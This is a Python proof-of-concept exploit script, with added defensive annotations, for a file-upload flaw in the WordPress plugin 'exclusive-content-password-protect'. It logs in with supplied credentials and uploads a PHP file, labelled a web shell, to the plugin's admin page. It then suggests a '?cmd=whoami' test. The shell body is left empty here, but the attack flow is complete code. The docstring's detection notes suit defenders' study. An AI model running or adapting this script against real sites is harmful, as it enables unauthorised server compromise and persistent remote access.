"""Proof-of-concept for a file-upload flaw in the WordPress plugin
``exclusive-content-password-protect`` (the argparse description names
"ECVE-2024-52402"; the leading "E" looks like a typo -- confirm the CVE id
against the advisory before citing it).

Flow as driven by ``main()``: fetch the plugin's ``readme.txt`` to read the
version, authenticate against ``wp-login.php`` with the supplied credentials,
then POST a multipart ``userfile`` to the plugin's admin page and assume the
file was written under ``wp-content/uploads``.

Defensive notes, grounded in what this script actually sends:

* Every request disables TLS certificate verification (``verify=False`` on
  the session and on each call), and the urllib3 warning that would flag
  that is silenced at import time.
* The traffic has a fixed shape: a constant desktop-Chrome ``User-Agent``,
  a GET to ``/wp-content/plugins/exclusive-content-password-protect/readme.txt``,
  a POST to ``/wp-login.php`` with ``rememberme=forever``, then a multipart
  POST to ``/wp-admin/admin.php?page=1.1.0%2Fcontent-password-protect.php``
  whose ``Referer`` equals that same URL.
* On-disk artifact if the upload succeeds: ``wp-content/uploads/nxploit.php``.
  Alerting on new ``.php`` files under ``uploads/`` and on POSTs to that
  ``admin.php?page=...`` URL covers this PoC.
* There is no version gate: ``is_potentially_vulnerable()`` always returns
  ``True``, so this file does not tell you which plugin versions are affected.
"""

import requests
import argparse
import re

# Nxploit, Khaled ALenazi

# Silence the urllib3 insecure-request warnings that the verify=False
# requests below would otherwise emit on every call.
requests.packages.urllib3.disable_warnings()


class WordPressExploiter:
    """Holds the target URL, credentials and a shared ``requests.Session``.

    Each public method performs one step of the flow described in the module
    docstring; none of them raises on HTTP errors -- they return ``None`` /
    ``False`` and leave error reporting to ``main()``.
    """

    def __init__(self, url: str, username: str, password: str) -> None:
        # Base URL is used as given; no trailing-slash normalisation, so a URL
        # ending in "/" yields "//wp-login.php"-style paths.
        self.url = url
        self.username = username
        self.password = password
        # Fixed browser UA sent on every request; a constant like this is a
        # usable detection fingerprint on the server side.
        self.user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
        self.session = self._initialize_session()

    def _initialize_session(self) -> requests.Session:
        """Return a session with TLS certificate verification turned off."""
        session = requests.Session()
        session.verify = False  # Ignore SSL verification (no cert validation at all)
        return session

    def get_plugin_version(self) -> str | None:
        """Read the 'Stable tag' from the plugin's public readme.txt.

        Returns:
            The ``X.Y.Z`` version string, or ``None`` when the readme is not
            reachable with HTTP 200 or carries no three-part stable tag.
        """
        readme_url = f"{self.url}/wp-content/plugins/exclusive-content-password-protect/readme.txt"
        response = self.session.get(readme_url, headers={"User-Agent": self.user_agent}, verify=False)
        if response.status_code == 200:
            # Only a strict three-component tag matches; "1.2" or "1.2.3.4"
            # would leave this returning None.
            match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
            if match:
                return match.group(1)
        return None

    def is_potentially_vulnerable(self, version: str | None) -> bool:
        """Version gate placeholder -- unconditionally ``True``.

        ``version`` is ignored, so ``main()`` proceeds against any detected
        version; do not read an affected-version range out of this method.
        """
        # This method is kept for any future version checks, but currently, it always returns True
        return True

    def login_to_wordpress(self) -> bool:
        """POST the credentials to wp-login.php and report whether a login cookie was set.

        Returns:
            ``True`` if any cookie in the session jar has ``wordpress_logged_in``
            in its name after the POST. The HTTP status of the response is not
            examined (``response`` is assigned but unused).
        """
        login_url = self.url + "/wp-login.php"
        login_data = {
            "log": self.username,
            "pwd": self.password,
            "rememberme": "forever",
            "wp-submit": "Log In"
        }
        response = self.session.post(login_url, data=login_data, headers={"User-Agent": self.user_agent}, verify=False)
        return any("wordpress_logged_in" in cookie.name for cookie in self.session.cookies)

    def upload_web_shell(self) -> str | None:
        """Send the multipart ``userfile`` POST to the plugin's admin page.

        ``shell_code`` is an empty string on this page, so the file uploaded as
        written has no content. A 200 response is taken as success; the script
        never confirms the file exists -- the returned URL is constructed from
        ``shell_filename``, not read back from the response.

        Returns:
            The assumed URL under ``wp-content/uploads`` on HTTP 200, else ``None``.
        """
        exploit_url = f"{self.url}/wp-admin/admin.php?page=1.1.0%2Fcontent-password-protect.php"
        shell_filename = "nxploit.php"
        shell_code = """"""
        files = {
            "userfile": (shell_filename, shell_code, "application/x-php")
        }
        headers = {
            "User-Agent": self.user_agent,
            # Referer set to the same admin URL; the request is otherwise a
            # plain multipart POST with no nonce field.
            "Referer": exploit_url
        }
        response = self.session.post(exploit_url, files=files, headers=headers, verify=False)
        if response.status_code == 200:
            return f"{self.url}/wp-content/uploads/{shell_filename}"
        return None


def main() -> None:
    """CLI entry point: parse -u/-un/-p, then run version check, login, upload.

    Exits early (plain ``return``, exit status 0) when the login cookie is not
    observed; the "not vulnerable" branch is unreachable in practice because
    ``is_potentially_vulnerable`` always returns ``True``.
    """
    parser = argparse.ArgumentParser(description="Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi ")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()

    exploiter = WordPressExploiter(args.url, args.username, args.password)
    version = exploiter.get_plugin_version()
    if version:
        print(f"[+] Plugin version detected: {version}")
        if exploiter.is_potentially_vulnerable(version):
            print("[!] Attempting exploitation...")
        else:
            print("[X] Site is not vulnerable. Exiting.")
            return
    else:
        # A missing readme does not stop the run; the upload is still attempted.
        print("[X] Could not determine the plugin version. Proceeding with exploitation attempt...")

    if exploiter.login_to_wordpress():
        print("[+] Logged in successfully.")
    else:
        print("[X] Failed to log in.")
        return

    shell_url = exploiter.upload_web_shell()
    if shell_url:
        # "Completed" here only means the POST returned 200; see upload_web_shell.
        print(f"[!] Exploit completed! Web Shell uploaded: {shell_url}")
        print(f"[*] Test with: {shell_url}?cmd=whoami")
    else:
        print("[X] Exploit failed. Check manually.")


if __name__ == "__main__":
    main()